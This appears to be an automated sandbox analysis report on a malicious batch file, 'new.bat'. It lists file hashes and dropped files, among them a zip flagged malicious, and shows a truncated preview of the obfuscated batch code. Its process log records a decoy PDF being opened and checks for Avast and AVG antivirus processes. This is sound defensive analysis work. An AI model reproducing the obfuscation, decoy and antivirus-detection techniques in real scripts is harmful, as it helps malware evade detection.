                                                                                                    SSDEEP:48:ZfWwaGsI9t7GSuVlIi4KKY5XX/HKNJg+1ZQYSmFo:ZfWPo9t7GSuV2gfqQYSmFo
                                                                                                    MD5:B29F59C74716C469F9C8182CB06A7802
                                                                                                    SHA1:5DDC4AD0809AB3003E3EEE90086F90A93D156A76
                                                                                                    SHA-256:2E4F09C249040A11C26428EAAA0619960A658DFDDC20ED34D3D4CF818F2A4867
                                                                                                    SHA-512:A9D60B3BEDCA1937CB9C0C59E509053BD2C79C6E36C8088A1BBA457254674294041C4E58B5D4919798C5D17EC36A803D85194A1B68EEEC7264A387445ABBA990
                                                                                                    Malicious:false
                                                                                                    Preview:/* Descriptors */..#ifndef Py_DESCROBJECT_H..#define Py_DESCROBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....typedef PyObject *(*getter)(PyObject *, void *);..typedef int (*setter)(PyObject *, PyObject *, void *);....struct PyGetSetDef {.. const char *name;.. getter get;.. setter set;.. const char *doc;.. void *closure;..};....PyAPI_DATA(PyTypeObject) PyClassMethodDescr_Type;..PyAPI_DATA(PyTypeObject) PyGetSetDescr_Type;..PyAPI_DATA(PyTypeObject) PyMemberDescr_Type;..PyAPI_DATA(PyTypeObject) PyMethodDescr_Type;..PyAPI_DATA(PyTypeObject) PyWrapperDescr_Type;..PyAPI_DATA(PyTypeObject) PyDictProxy_Type;..PyAPI_DATA(PyTypeObject) PyProperty_Type;....PyAPI_FUNC(PyObject *) PyDescr_NewMethod(PyTypeObject *, PyMethodDef *);..PyAPI_FUNC(PyObject *) PyDescr_NewClassMethod(PyTypeObject *, PyMethodDef *);..PyAPI_FUNC(PyObject *) PyDescr_NewMember(PyTypeObject *, PyMemberDef *);..PyAPI_FUNC(PyObject *) PyDescr_NewGetSet(PyTypeObject *, PyGetSetDef *);....PyAPI_FUNC(PyObject *)
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3957
                                                                                                    Entropy (8bit):5.1908930842166825
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:gMsfukOK4T5scN2CrOHex8FAEneZA3xAguRZJDA:gnFM9b4Crdx8XpfkZJDA
                                                                                                    MD5:D20468E39BD51A166F7C86510A11212E
                                                                                                    SHA1:693DBD03EC44BC8FAA850890931C045371A97D0D
                                                                                                    SHA-256:5CF8D61D4B6C0CCBD3E25CBCF2C4C90CB59898A9B483B61F38049010C64464F5
                                                                                                    SHA-512:980FF4A001EDAECF9928D8AF96CA678973001DD0185BBE01B18266132D27A942382AC1EB29DD1A06872DBA0A1DFC42EA5344EC969EDDD47A02C6A8A51E0A1916
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_DICTOBJECT_H..#define Py_DICTOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif..../* Dictionary object type -- mapping from hashable object to object */..../* The distribution includes a separate file, Objects/dictnotes.txt,.. describing explorations into dictionary design and optimization... It covers typical dictionary use patterns, the parameters for.. tuning dictionaries, and several ideas for possible optimizations...*/....PyAPI_DATA(PyTypeObject) PyDict_Type;....#define PyDict_Check(op) \.. PyType_FastSubclass(Py_TYPE(op), Py_TPFLAGS_DICT_SUBCLASS)..#define PyDict_CheckExact(op) Py_IS_TYPE((op), &PyDict_Type)....PyAPI_FUNC(PyObject *) PyDict_New(void);..PyAPI_FUNC(PyObject *) PyDict_GetItem(PyObject *mp, PyObject *key);..PyAPI_FUNC(PyObject *) PyDict_GetItemWithError(PyObject *mp, PyObject *key);..PyAPI_FUNC(int) PyDict_SetItem(PyObject *mp, PyObject *key, PyObject *item);..PyAPI_FUNC(int) PyDict_DelItem(PyObject *mp, PyObject *key);..PyAPI_FUNC(
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22970
                                                                                                    Entropy (8bit):5.103276806113682
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jrsZqwzgPjymk1Va56g4WAQRodgImv9USD5p2TIv4F7Z3iyGdUbC/:jAzgPjlkjaVAQRodhmv9pn2TDF93iyG1
                                                                                                    MD5:4F07D9613490E5D737060B0B4C293ADC
                                                                                                    SHA1:4D88371BAB39A92D9A660ADE90BF28D60148ABA5
                                                                                                    SHA-256:BF89A0C7BF40CF5C97BED63BB8C9C25ED93544833BF4CFF483FAFAC8245C9B0F
                                                                                                    SHA-512:A08DCDAF7082B1F7B091BC9D9ECBD7F6EF8FEA72B7798AC218407406EBDE591C3A38F3E410E4A17D63A44680B20D50BC04A4D558A7D4DCCE0C4BD39FD6CACE6C
                                                                                                    Malicious:false
                                                                                                    Preview:/* Copyright (c) 2008-2009, Google Inc... * All rights reserved... *.. * Redistribution and use in source and binary forms, with or without.. * modification, are permitted provided that the following conditions are.. * met:.. *.. * * Redistributions of source code must retain the above copyright.. * notice, this list of conditions and the following disclaimer... * * Neither the name of Google Inc. nor the names of its.. * contributors may be used to endorse or promote products derived from.. * this software without specific prior written permission... *.. * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.. * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.. * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.. * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT.. * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,.. * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):270
                                                                                                    Entropy (8bit):5.124776919282634
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:YkLko+6P2Q0Pjo+6h8FOQI28AGRKmGjQ6QMtZb6TzJ581iHe7YJ581DFEvGHGjQc:BD2Q0u8Ad2xjQ6z3ueBhG5jQ6dKQ
                                                                                                    MD5:EF325605B8543385361518B5851C081C
                                                                                                    SHA1:E5547AAF812F76ADD841C4DD473EF6B87F9BF5D3
                                                                                                    SHA-256:469C8A7BBCA8A67FD17BC728A1D6D4225C4C0566475774B5DEB655462F058659
                                                                                                    SHA-512:A7A676339EA79E81D82B59A298DB0F9C3A2E304592828FD95903017F2613EF049AAA13B89C87A7ACEBE45A7B8B9F938E7A05802FC42CD75E40D1C025D99E2E9E
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_ENUMOBJECT_H..#define Py_ENUMOBJECT_H..../* Enumerate Object */....#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(PyTypeObject) PyEnum_Type;..PyAPI_DATA(PyTypeObject) PyReversed_Type;....#ifdef __cplusplus..}..#endif....#endif /* !Py_ENUMOBJECT_H */..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1817
                                                                                                    Entropy (8bit):4.645101362811805
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:UsYLLCAHrNiZVUUmcF8r6F4d1sjlFgt2veBKAAscjNC6wH//CLcB+Ek/:8brQUi8sjXMKg2wHccB+p/
                                                                                                    MD5:07679B5432B9FEF1FE8FC28AAC2FC591
                                                                                                    SHA1:48812742ABC6C994B449E061C3015FEF441C202C
                                                                                                    SHA-256:737D53F8259E5B46765D48C154669A6EECE8177CB7B0702039D6C24792C7201E
                                                                                                    SHA-512:318F0C8FBCA50F67316D564C94992B77F6B37A330B5722254E539515D9976CDDF272E2563202F63C3E78C9B92A2F2BD0AF0A44E33F24F12B573706418533B46E
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_ERRCODE_H..#define Py_ERRCODE_H..#ifdef __cplusplus..extern "C" {..#endif..../* Error codes passed around between file input, tokenizer, parser and.. interpreter. This is necessary so we can turn them into Python.. exceptions at a higher level. Note that some errors have a.. slightly different meaning when passed from the tokenizer to the.. parser than when passed from the parser to the interpreter; e.g... the parser only returns E_EOF when it hits EOF immediately, and it.. never returns E_OK. */....#define E_OK 10 /* No error */..#define E_EOF 11 /* End Of File */..#define E_INTR 12 /* Interrupted */..#define E_TOKEN 13 /* Bad token */..#define E_SYNTAX 14 /* Syntax error */..#define E_NOMEM 15 /* Ran out of memory */..#define E_DONE 16 /* Parsing complete */..#define E_ERROR 17 /* Execution error */..#define E_TABSPACE 18 /* Inconsi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1303
                                                                                                    Entropy (8bit):5.0377119664077945
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:5lfgGr/RQrNRIeXHWQkTPGI4qeR74nju2kQQL:nfgGlH+IaR8y3
                                                                                                    MD5:E93C3D37A144F0217DB37091E7652F6A
                                                                                                    SHA1:01E37A39587DCFE5E922F86B20926975C2AF5869
                                                                                                    SHA-256:D0FB5200D025BB849A1B0D9DA5C9D9CB7D3E8634CD1521AAE9FC5FC76FF5B623
                                                                                                    SHA-512:4E90F7E67C83431514C1EA65F8992C0780ED5A0E6638CD22481054B481B1C418696FFD6A369CA05086F7D063EB69E50BB8B26DF354E56077E0E7E56C00991AD7
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_EXPORTS_H..#define Py_EXPORTS_H....#if defined(_WIN32) || defined(__CYGWIN__).. #if defined(Py_ENABLE_SHARED).. #define Py_IMPORTED_SYMBOL __declspec(dllimport).. #define Py_EXPORTED_SYMBOL __declspec(dllexport).. #define Py_LOCAL_SYMBOL.. #else.. #define Py_IMPORTED_SYMBOL.. #define Py_EXPORTED_SYMBOL.. #define Py_LOCAL_SYMBOL.. #endif..#else../*.. * If we only ever used gcc >= 5, we could use __has_attribute(visibility).. * as a cross-platform way to determine if visibility is supported. However,.. * we may still need to support gcc >= 4, as some Ubuntu LTS and Centos versions.. * have 4 < gcc < 5... */.. #ifndef __has_attribute.. #define __has_attribute(x) 0 // Compatibility with non-clang compilers... #endif.. #if (defined(__GNUC__) && (__GNUC__ >= 4)) ||\.. (defined(__clang__) && __has_attribute(visibility)).. #define Py_IMPORTED_SYMBOL __attribute__ ((visibility ("default"))).. #defi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1699
                                                                                                    Entropy (8bit):5.316102365915941
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:pyFYJ4vAQm3ujhFr7Qs7GaDPfMMvz6sGTqEV/KIdiYCY/oujnjalj0UE:wFLzm3ujEtaDHMY6sGTqkzml2
                                                                                                    MD5:1509869174E08BF2FE7C91A4FB23CF0A
                                                                                                    SHA1:F3D8F1C37F77FCD9EFE2C9D64CAD5EAC479B3D2A
                                                                                                    SHA-256:44E912F70D933B6A5C1DF1584799671D10B984DAB9B940B37EEE0E6E1B94378B
                                                                                                    SHA-512:04CCE974AEDCB90A024FA15A1185516276220D11BCCAE41BA6C6E057793A8415A8785FBFC9FCA318831E0D9A4D3F1B0533B37AB76BF2CDDD39E4106785297B84
                                                                                                    Malicious:false
                                                                                                    Preview:/* File object interface (what's left of it -- see io.py) */....#ifndef Py_FILEOBJECT_H..#define Py_FILEOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#define PY_STDIOTEXTMODE "b"....PyAPI_FUNC(PyObject *) PyFile_FromFd(int, const char *, const char *, int,.. const char *, const char *,.. const char *, int);..PyAPI_FUNC(PyObject *) PyFile_GetLine(PyObject *, int);..PyAPI_FUNC(int) PyFile_WriteObject(PyObject *, PyObject *, int);..PyAPI_FUNC(int) PyFile_WriteString(const char *, PyObject *);..PyAPI_FUNC(int) PyObject_AsFileDescriptor(PyObject *);..../* The default encoding used by the platform file system APIs.. If non-NULL, this is different than the default encoding for strings..*/..Py_DEPRECATED(3.12) PyAPI_DATA(const char *) Py_FileSystemDefaultEncoding;..#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03060000..Py_DEPRECATED(3.12) PyAPI_DATA(const char *) Py_FileSystemDefaultEncodeErrors;..#endif
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):533
                                                                                                    Entropy (8bit):5.262910041141389
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:BAOfsmNELN8zlZNE0JqQerCJ7sotc7oFBLorrPD:VbCOPN7qauF0lyzD
                                                                                                    MD5:467643A21BBDF939E59D7C53BA5821AB
                                                                                                    SHA1:4BB4A5A7867DA4957EC577C08793E3F4E4A10BF7
                                                                                                    SHA-256:B07EA9C8C3975A1FF9D289B8DDAAE2A3BDDA2D4B3AD28615950EDE52B325F591
                                                                                                    SHA-512:CE7CF8DDB8ACBBE8B81B6197555343293C24B4AFCBDF62E54F74BB395438DF104104E958056550DDD5419C6F280FFFA6DAB4B744A4F748D0CCC32A0BEBE600E5
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_FILEUTILS_H..#define Py_FILEUTILS_H..#ifdef __cplusplus..extern "C" {..#endif....#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03050000..PyAPI_FUNC(wchar_t *) Py_DecodeLocale(.. const char *arg,.. size_t *size);....PyAPI_FUNC(char*) Py_EncodeLocale(.. const wchar_t *text,.. size_t *error_pos);..#endif....#ifndef Py_LIMITED_API..# define Py_CPYTHON_FILEUTILS_H..# include "cpython/fileutils.h"..# undef Py_CPYTHON_FILEUTILS_H..#endif....#ifdef __cplusplus..}..#endif..#endif /* !Py_FILEUTILS_H */..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1586
                                                                                                    Entropy (8bit):4.944717018882962
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:jdjzQVkZQoRDC6O5XHPCPsOq1SuPGGm+twt:jROCW3PCPsT1SuPm+tC
                                                                                                    MD5:349DB80A65D2891EB51CC03BC2FC9417
                                                                                                    SHA1:966C11341E57E932240672B0566D5BBAB86F0D9C
                                                                                                    SHA-256:143630CCF4E2445581DB09F8ADBA2C86D5380EEE68D8A752F7F9B9017F109DCA
                                                                                                    SHA-512:0F08F8C7A733F6286E5F21161A3CC652704BDED719D6F7A915F1E2CA1D81CC6A7B7C43BC249A8A91F6478AC503BD5EF2EC5EBAFB955BB3A5CB3CDD71932F457B
                                                                                                    Malicious:false
                                                                                                    Preview:../* Float object interface */..../*..PyFloatObject represents a (double precision) floating point number...*/....#ifndef Py_FLOATOBJECT_H..#define Py_FLOATOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(PyTypeObject) PyFloat_Type;....#define PyFloat_Check(op) PyObject_TypeCheck(op, &PyFloat_Type)..#define PyFloat_CheckExact(op) Py_IS_TYPE((op), &PyFloat_Type)....#define Py_RETURN_NAN return PyFloat_FromDouble(Py_NAN)....#define Py_RETURN_INF(sign) \.. do { \.. if (copysign(1., sign) == 1.) { \.. return PyFloat_FromDouble(Py_HUGE_VAL); \.. } \.. else { \.. return PyFloat_FromDouble(-Py_HUGE_VAL); \.. } \.. } while(0)....PyAPI_FUNC(double) PyFloat_GetMax(void);..PyAPI_FUNC(double) PyFloat_GetMin(void);..PyAPI_FU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):356
                                                                                                    Entropy (8bit):5.166839299334996
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:UbSHKoqrIxv4mA2Q0Phv4mAmjQ6zMAserCJs0fSq4mAwAkV5Kzy3Bpq4mAVjQ6dO:UbSmrRcaqMAserCJ7G/cp3BFZ2l
                                                                                                    MD5:EBC4DAF5237CECED6E0692668597F2CB
                                                                                                    SHA1:C651EA83ABCB608FB363D21D408239880394EA7D
                                                                                                    SHA-256:52E7B1F56DA8F7E78A2567FE9AF98C6F97250F0BBB81951DF4215C8BD1C468F7
                                                                                                    SHA-512:3A1D4F1CA1C69BEBCFEB7DC9F3E0BB71DB225184AEAB9639DC5BD5BE2F8753B3619F82109B3935E274833DA6C80A87F66A6DDD7CB1E16BB1368A92D8AD427CEE
                                                                                                    Malicious:false
                                                                                                    Preview:/* Frame object interface */....#ifndef Py_FRAMEOBJECT_H..#define Py_FRAMEOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#include "pyframe.h"....#ifndef Py_LIMITED_API..# define Py_CPYTHON_FRAMEOBJECT_H..# include "cpython/frameobject.h"..# undef Py_CPYTHON_FRAMEOBJECT_H..#endif....#ifdef __cplusplus..}..#endif..#endif /* !Py_FRAMEOBJECT_H */..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):348
                                                                                                    Entropy (8bit):5.354149111571425
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:j7eE41HOQFn3v1rx2Q0PimjQ6zheWENrF+i5jQ6dne:j7U1Hpv1rgHVhnEqge
                                                                                                    MD5:8F84875A052BF2CC69C8695AB9CE8BC0
                                                                                                    SHA1:841CA5B940D9B7E27B825F1E9600D4F778C658C5
                                                                                                    SHA-256:3EBD563F70F3D317558774E74916AF1C294852FD943E041A79DC46C8FBCC458E
                                                                                                    SHA-512:3571A31790779EB12BDFADE31CEC79D6299336041E483D87DED81000CE1E56451B495199B61F48B3F4856C1433CE5FDA21BD15BF83E8A78431CB541C707D5B5D
                                                                                                    Malicious:false
                                                                                                    Preview:// Implementation of PEP 585: support list[int] etc...#ifndef Py_GENERICALIASOBJECT_H..#define Py_GENERICALIASOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_FUNC(PyObject *) Py_GenericAlias(PyObject *, PyObject *);..PyAPI_DATA(PyTypeObject) Py_GenericAliasType;....#ifdef __cplusplus..}..#endif..#endif /* !Py_GENERICALIASOBJECT_H */..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3131
                                                                                                    Entropy (8bit):5.162233212678965
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:5s0HAnqznc1vH8tAYimSHomuQsnDHYL+Rk:jYQAH8WHuVb7k
                                                                                                    MD5:BB067CEE86A2558D0D7107180E53EEDE
                                                                                                    SHA1:94181ED1CBD11173D2656BCFAD5CAC897C2BB647
                                                                                                    SHA-256:EBCEDC84109D94B9A1525055BBC5E33997F51A92597525ABA037372FDEE83065
                                                                                                    SHA-512:00039A81D143EB44A128A52121BB2218A7DFB15F69BF63C186B685A9B0837CDE15AAC81C60BAADEB5FE9A57FE06F001483288BD485BB03E801235EF3CC08F825
                                                                                                    Malicious:false
                                                                                                    Preview:/* Module definition and import interface */....#ifndef Py_IMPORT_H..#define Py_IMPORT_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_FUNC(long) PyImport_GetMagicNumber(void);..PyAPI_FUNC(const char *) PyImport_GetMagicTag(void);..PyAPI_FUNC(PyObject *) PyImport_ExecCodeModule(.. const char *name, /* UTF-8 encoded string */.. PyObject *co.. );..PyAPI_FUNC(PyObject *) PyImport_ExecCodeModuleEx(.. const char *name, /* UTF-8 encoded string */.. PyObject *co,.. const char *pathname /* decoded from the filesystem encoding */.. );..PyAPI_FUNC(PyObject *) PyImport_ExecCodeModuleWithPathnames(.. const char *name, /* UTF-8 encoded string */.. PyObject *co,.. const char *pathname, /* decoded from the filesystem encoding */.. const char *cpathname /* decoded from the filesystem encoding */.. );..#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03030000..PyAPI_FUNC(PyObject *) PyImport_ExecCodeModuleObj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                    Category:dropped
                                                                                                    Size (bytes):51579928
                                                                                                    Entropy (8bit):7.995911917314392
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:786432:hADXXuC9mkLqH0C1SWvEWbW7ZhG0HQaocLeo0mGztnsoiY7:ODngkLqHDxsbVh5waNLglBsrY7
                                                                                                    MD5:1CC3F633B062886BC565A89B10C3D5A8
                                                                                                    SHA1:37B510E6523E008CBB8316D30CD20EF883CBEA53
                                                                                                    SHA-256:A43C024E93EA0F63ECC5A719B5823DDD4B3BD0A2DD135940F1D9C599E2B90E7A
                                                                                                    SHA-512:1BBFE34149FE5356EA7D6CAFAF4F4C5CBEB15E48907B7227936915341D6CF72F77C18D602FFFB2FC978F975C2D3B3EF13AE922CDC186FE7BBAF82D9C3E73DD3E
                                                                                                    Malicious:true
                                                                                                    Preview:PK...........X................Python/Launcher/PK........Vv.Xn...44..........Python/Launcher/py.exe.{|.E...L..Cz....!@.h.#.H...$*..1...X..8."tC\..;....rwau....]v....$....<.1..(..]t+.j........$.{.......q.tWW.:u....).k..(....t]..../W.....AH..Z..c.{..,s..ug......w...L...z.a)..e.....{(}......^.l..!.2..+'O.3.t.H.........e#^d..G\...G.F8.......{n|wd6.[8b..p.,....p..oG..].y.}?.`;..'.W..X......f^..`.lI.F.<A...dy)A.8./..[......y...s;?..|.]...6v...M-..R.J.....[..`.u#.....P.F.p.......w...m......eU....L..a_.}a..a...K.$.H..</...+.......9....6(..}.Ep...W,.1.y_A.....K.[......<.\p....7S......u.og...c..:.>......u.....u.F[t.Wi.....A.."..5....b..?.^x'.w.U*bU.X.EW....bA}|.>.].........E.%P..7.c.=.NlP[i..Qu...N..8|.M..t.. l..f..}jm......>._*.>...v....p...P/...t}..#..Yi.C]bAG.k.<}.b.x..*.l.M.,.=.....k(,9..em.VLp.+T(.u..V(.3l.4.j.|z.....a........bh.:A;Aq......S.-.O. .Od[).....[G.Q...@....}z...p:.b.t. ..f.`F....~|...&u= ..U..P....f........F\...G/..)...c....&.?3...
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55
                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                    Malicious:false
                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                    File type:Unicode text, UTF-16, little-endian text, with very long lines (17429), with no line terminators
                                                                                                    Entropy (8bit):3.9670450741027063
                                                                                                    TrID:
                                                                                                    • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                                                                                    • MP3 audio (1001/1) 33.33%
                                                                                                    File name:new.bat
                                                                                                    File size:34'861 bytes
                                                                                                    MD5:7b66e627772c9938b6aa1295f677440e
                                                                                                    SHA1:f205c9ef9b3c1792b10970ba1b49ffdbba35ef9d
                                                                                                    SHA256:37ff3fde213752b29ba69ac327b27de8f4e93d6de8534e0cb0f781c1a493c2ab
                                                                                                    SHA512:50939cbe7d9cbc7269350b0b0edac2b0f91776189e589f53c5d3a7c828acd831c38d28955dcc498a2dfd00da499514ce0b5cf5a2b1b3872db85854bb5393ee18
                                                                                                    SSDEEP:192:nK0JLZYjFsqH0melk6y8g1sDYiS+DS5nbl6HNifZUESNTfs8wUWZSr18qvqS:Kzds5YirSJlKOZUEgTU8CZwqS
                                                                                                    TLSH:D2F2ECA07BF3070A304EB8DBA1A374111D96F47E26FB289ADD153D6489C51089F06BFB
                                                                                                    File Content Preview:..&@cls&@set ".joL.=j1ot5Nd4rRHnzkO lZWv3aFAXs9gipw8The0VKfUyIbuJ7EGxC6MQ@2cqBLDPYSm"..%.joL.:~53,1%%.joL.:~34,1%%.joL.:~55,1%%.joL.:~33,1%%.joL.:~2,1%%.joL.:~15,1%%.joL.:~2,1%%.joL.:~38,1%%.joL.:~38,1%%..p.eo.%..%.joL.:~25,1%%.joL.:~34,1%%.joL.:~3,1%%.jo
                                                                                                    Icon Hash:9686878b929a9886
                                                                                                    No network behavior found

                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:08:30:06
                                                                                                    Start date:12/11/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "
                                                                                                    Imagebase:0x7ff64eb20000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:1
                                                                                                    Start time:08:30:06
                                                                                                    Start date:12/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:2
                                                                                                    Start time:08:30:07
                                                                                                    Start date:12/11/2024
                                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BPMLNOBVSB.pdf"
                                                                                                    Imagebase:0x7ff6bc1b0000
                                                                                                    File size:5'641'176 bytes
                                                                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:3
                                                                                                    Start time:08:30:07
                                                                                                    Start date:12/11/2024
                                                                                                    Path:C:\Windows\System32\timeout.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
                                                                                                    Imagebase:0x7ff71ed70000
                                                                                                    File size:32'768 bytes
                                                                                                    MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:08:30:07
                                                                                                    Start date:12/11/2024
                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:tasklist /FI "IMAGENAME eq AvastUI.exe"
                                                                                                    Imagebase:0x7ff7732d0000
                                                                                                    File size:106'496 bytes
                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:08:30:07
                                                                                                    Start date:12/11/2024
                                                                                                    Path:C:\Windows\System32\find.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:find /i "AvastUI.exe"
                                                                                                    Imagebase:0x7ff7e1f90000
                                                                                                    File size:17'920 bytes
                                                                                                    MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:08:30:07
                                                                                                    Start date:12/11/2024
                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:tasklist /FI "IMAGENAME eq avgui.exe"
                                                                                                    Imagebase:0x7ff7732d0000
                                                                                                    File size:106'496 bytes
                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
